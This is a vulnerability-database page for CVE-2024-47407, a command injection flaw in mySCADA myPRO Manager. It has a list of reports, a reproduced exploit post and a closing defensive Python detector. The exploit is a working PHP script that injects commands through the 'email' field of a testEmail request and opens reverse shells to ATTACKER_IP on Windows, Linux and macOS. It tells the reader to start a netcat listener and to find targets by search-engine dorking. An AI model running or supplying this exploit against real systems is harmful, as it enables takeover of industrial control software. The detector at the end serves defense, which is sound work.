| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-47407 | 21 Nov 2024 11:00 | – | circl |
| mySCADA myPRO Operating System Command Injection Vulnerability | 22 Nov 2024 00:00 | – | cnnvd |
| mySCADA myPRO Manager Operating System Command Injection Vulnerability | 25 Nov 2024 00:00 | – | cnvd |
| CVE-2024-47407 | 22 Nov 2024 22:15 | – | cve |
| CVE-2024-47407 mySCADA myPRO OS Command Injection | 22 Nov 2024 22:15 | – | cvelist |
| mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407) | 11 Feb 2025 18:55 | – | metasploit |
| mySCADA PRO Manager Command Injection (CVE-2024-47407) | 28 Jan 2025 00:00 | – | nessus |
| CVE-2024-47407 | 22 Nov 2024 23:15 | – | nvd |
| MySCADA MyPRO Manager 1.2 Command Injection | 11 Feb 2025 00:00 | – | packetstorm |
| MyPRO Manager 1.2 Command Injection | 30 Jan 2026 00:00 | – | packetstorm |

=============================================================================================================================================
| # Title : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description:
PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.
Send an HTTP POST request to /get with the email data containing the command to be executed.
Check if the response is 200, meaning the command was executed successfully.
Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT
(Related: https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407).
[+] Save code as poc.php.
[+] Set Target : line 4 + 5 + 6
[+] Usage : php poc.php
[+] Payload :
<?php
// by indoushka
// Exploits CVE-2024-47407 in mySCADA myPRO Manager to obtain a reverse shell on different operating systems
$target = "http://target-ip:34022/get"; // replace with the target's IP
$attacker_ip = "ATTACKER_IP"; // replace with the attacker's IP
$attacker_port = "ATTACKER_PORT"; // replace with the port you will listen on
// Detect the operating system and run the matching payload
$windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";
$linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";
$mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";
// Build the email value used for the command injection
$email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";
$email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
$email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
$email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
$email_injection .= " #";
// Prepare the request data
$data = json_encode([
"command" => "testEmail",
"email" => $email_injection
]);
// Send the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check whether the exploit succeeded
if ($http_code == 200) {
echo "[+] تم إرسال حمولة Shell Reverse بنجاح! انتظر الاتصال على المنفذ $attacker_port\n";
} else {
echo "[-] فشل التنفيذ، ربما النظام محمي.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
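
A defender-side check for the request shape described above (a POST to /get carrying "command": "testEmail" and a crafted email value), as an added example that is not part of the original advisory or of mySCADA's code: it flags testEmail requests whose email field is anything other than a plain address. The function name, the metacharacter set, the address pattern and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# Strict address shape (assumption): one '@', no whitespace, no shell syntax.
EMAIL_RE = re.compile(r"[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# Characters that cmd.exe or a POSIX shell treat as operators, quoting or expansion.
SHELL_META = set("&;|`$()<>\"'\\#%^\n\r")


def inspect_request(method, path, body):
    """Return a list of findings for one HTTP request (empty list = nothing flagged)."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/get":
        return []
    try:
        doc = json.loads(body)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return ["unparseable JSON body on /get"]
    if not isinstance(doc, dict) or doc.get("command") != "testEmail":
        return []
    email = doc.get("email")
    if not isinstance(email, str):
        return ["testEmail: email field is not a string"]
    findings = []
    if len(email) > 254:
        findings.append("testEmail: email longer than 254 characters")
    meta = sorted(SHELL_META.intersection(email))
    if meta:
        findings.append("testEmail: shell metacharacters in email: " + repr("".join(meta)))
    if not EMAIL_RE.fullmatch(email):
        findings.append("testEmail: email is not a plain address")
    return findings


# Constructed sample requests (method, path, JSON body); not captured traffic.
SAMPLES = [
    ("POST", "/get", b'{"command": "testEmail", "email": "operator@plant.example"}'),
    ("POST", "/get", b'{"command": "testEmail", "email": "123@4567.com&&echo marker #"}'),
    ("POST", "/get", b'{"command": "testEmail", "email": ["a@b.example"]}'),
    ("GET", "/get", b""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body) or "ok")
```

The same allow-list test, applied server-side before the address reaches any command line, is the corresponding input-validation control; as a detection rule it belongs on a reverse proxy or in log review for the myPRO Manager port.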